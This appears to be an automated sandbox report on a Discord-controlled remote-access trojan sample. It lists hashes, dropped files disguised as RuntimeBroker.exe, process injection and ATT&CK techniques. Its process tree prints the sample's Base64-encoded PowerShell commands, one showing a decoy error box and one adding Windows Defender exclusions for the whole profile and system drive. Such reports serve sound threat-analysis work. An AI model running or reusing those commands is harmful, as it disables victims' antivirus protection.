discordrat | cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623

General

Target

JungLoaderFixed.exe
Size

21.3MB
MD5

7aa4185295ab3f4f896704aed05c0795
SHA1

3ae4ec10990ff35a466328f1bc0e8ece616df3c3
SHA256

cb300f10e391aa185ea9555d9122f91dca8eb2dfb064f14180340f48b83be623
SHA512

997ffd6fae8e72b7ca5c62f7de9a9a2c487580b0fec589d305c485163ff873539baa20c5791c3626403cf824a02ebf458c24e28236eae45a75461d1ba88a9e45
SSDEEP

393216:jVymy1SvjN1GnU7s1/aRUFWYbyemyzgnfpyyxlj3OMddmZceVUJA9OhBI1Hs7:Em+SvZs+sldbzgRhFldmZceX9OP7

Score

10^/10

discordrat defense_evasion persistence pyinstaller rat rootkit stealer upx

Malware Config

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Executes dropped EXE 3 IoCs

pid	Process
1692	RuntimeBroker.exe
2084	RuntimeBroker2.0.exe
976	RuntimeBroker.exe

Loads dropped DLL 11 IoCs

pid	Process
2696	JungLoaderFixed.exe
2696	JungLoaderFixed.exe
1692	RuntimeBroker.exe
976	RuntimeBroker.exe
2272	WerFault.exe
2272	WerFault.exe
2272	WerFault.exe
2272	WerFault.exe
2272	WerFault.exe
1180	Process not Found
1180	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000018bc8-40.dat	upx
behavioral1/memory/976-42-0x000007FEEA410000-0x000007FEEA876000-memory.dmp	upx

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000b000000012283-16.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2868	powershell.exe
2848	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
976	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2696 wrote to memory of 2848	2696	JungLoaderFixed.exe	30
PID 2696 wrote to memory of 2848	2696	JungLoaderFixed.exe	30
PID 2696 wrote to memory of 2848	2696	JungLoaderFixed.exe	30
PID 2696 wrote to memory of 2868	2696	JungLoaderFixed.exe	32
PID 2696 wrote to memory of 2868	2696	JungLoaderFixed.exe	32
PID 2696 wrote to memory of 2868	2696	JungLoaderFixed.exe	32
PID 2696 wrote to memory of 1692	2696	JungLoaderFixed.exe	34
PID 2696 wrote to memory of 1692	2696	JungLoaderFixed.exe	34
PID 2696 wrote to memory of 1692	2696	JungLoaderFixed.exe	34
PID 2696 wrote to memory of 2084	2696	JungLoaderFixed.exe	35
PID 2696 wrote to memory of 2084	2696	JungLoaderFixed.exe	35
PID 2696 wrote to memory of 2084	2696	JungLoaderFixed.exe	35
PID 1692 wrote to memory of 976	1692	RuntimeBroker.exe	36
PID 1692 wrote to memory of 976	1692	RuntimeBroker.exe	36
PID 1692 wrote to memory of 976	1692	RuntimeBroker.exe	36
PID 2084 wrote to memory of 2272	2084	RuntimeBroker2.0.exe	37
PID 2084 wrote to memory of 2272	2084	RuntimeBroker2.0.exe	37
PID 2084 wrote to memory of 2272	2084	RuntimeBroker2.0.exe	37

C:\Users\Admin\AppData\Local\Temp\JungLoaderFixed.exe
"C:\Users\Admin\AppData\Local\Temp\JungLoaderFixed.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAaQBqACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHIAcgBwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByADoAIABlAHgAcABlAGMAdABlAGQAIAAnACcAOwAnACcAIABiAGUAZgBvAHIAZQAgACcAJwByAGUAdAB1AHIAbgAnACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAegB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAawBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAbgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAbAB5ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2868
- C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:976
- C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe
  "C:\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2084
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2084 -s 596
    3⤵
    - Loads dropped DLL
    PID:2272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

1

T1027

Command Obfuscation

1

T1027.010

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI16922\python310.dll

Filesize
1.4MB

MD5
4a6afa2200b1918c413d511c5a3c041c

SHA1
39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3

SHA256
bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da

SHA512
dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5079180a995d36e613312de007cbd072

SHA1
a9396aa7abfe7e63bb2bc0d4c692a59bf13aac01

SHA256
e1bc89106507cc3f5635dda2f8b561f38300c5dfc6738484297d19256735d993

SHA512
72b7e005167f0e0642b2e192212b822d051ac4090ab3c40dd32300d8f3ca0ab8b85b4728e0345ca02077b3fc300a66bdbbc074d02e7043111a44c3025acdd4df

Download Submit
\Users\Admin\AppData\Roaming\RuntimeBroker.exe

Filesize
21.2MB

MD5
a83964f260c28614da067f6b3df9e044

SHA1
157304b579228e7d41e6218eac935339854bb431

SHA256
f5d2b5a19575e7b3041b846263316f66f80c2804f9e0f2376e1576612d27cca8

SHA512
dd4e8fa7fb45f091fd875eb347bb594ef7d890921255e2ba985e4f96a938b4997ce81f51a5951f3633d93c38e336e8fb4dc7eeec6545203076865ec6b0e232e1

Download Submit
\Users\Admin\AppData\Roaming\RuntimeBroker2.0.exe

Filesize
79KB

MD5
95af6e5d52a57515dc2e638c419f50d9

SHA1
d359abc0ebb9877c917e125fb4e28c24b27696a4

SHA256
0fe67abfd1a323e19a065a54d544f0997f5853f7a51a3526c10c1a15bf5b5749

SHA512
cfb2d075d75af7f965e961eccbf3f188e64a5b594e556a9bf8569f2c2380065fb2781e4e4689d87b7af65066cac217e59cf0a7d32f43f2bd61938aa06791b50b

Download Submit
memory/976-42-0x000007FEEA410000-0x000007FEEA876000-memory.dmp

Filesize
4.4MB

Download
memory/2084-44-0x000000013F650000-0x000000013F668000-memory.dmp

Filesize
96KB

Download
memory/2696-0-0x000007FEF5CB3000-0x000007FEF5CB4000-memory.dmp

Filesize
4KB

Download
memory/2696-1-0x0000000001360000-0x00000000028AE000-memory.dmp

Filesize
21.3MB

Download
memory/2696-2-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp

Filesize
9.9MB

Download
memory/2696-43-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp

Filesize
9.9MB

Download
memory/2868-12-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2868-13-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing